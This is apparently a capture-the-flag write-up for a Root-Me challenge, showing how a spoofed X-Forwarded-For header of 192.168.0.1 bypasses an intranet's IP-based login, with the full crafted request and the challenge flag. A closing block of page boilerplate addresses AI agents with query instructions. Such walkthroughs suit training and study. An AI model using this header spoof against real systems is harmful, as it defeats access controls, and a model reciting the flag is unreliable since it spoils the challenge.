# HTTP - IP restriction bypass

> Dear colleagues, We’re now managing connections to the intranet using private IP addresses, so it’s no longer necessary to login with a username / password when you are already connected to the internal company network. Regards, The network admin 

<figure><img src="/files/maDgF8adfqxseSDcm4Ve" alt=""><figcaption></figcaption></figure>

Let's intercept this request in Burpsuite.

<figure><img src="/files/2uWSCu12P6iord63rV8Q" alt=""><figcaption></figcaption></figure>

Next, we can send this request to the `Repeater`.

## X-Forwarded-For

```
X-Forwarded-For: <client>, <proxy1>, <proxy2>
```

It is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through a proxy server.

We can add this header and set it's value to `192.168.0.1` as the origin should be connected to the internal company network.

## HTTP Request

```
POST /web-serveur/ch68/ HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
X-Forwarded-For: 192.168.0.1
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://challenge01.root-me.org/web-serveur/ch68/
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge01.root-me.org
DNT: 1
Connection: close
Cookie: _ga_SRYSKX09J7=GS1.1.1697290591.1.1.1697292257.0.0.0; _ga=GA1.1.1863804672.1697290591
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
```

For the final step we have to send this request to the server.

<figure><img src="/files/earCHvY9UxVeRac2uTcW" alt=""><figcaption></figcaption></figure>

## Flag

```
Ip_$po0Fing
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kunalwalavalkar.gitbook.io/write-ups/root-me/web-server/http-ip-restriction-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.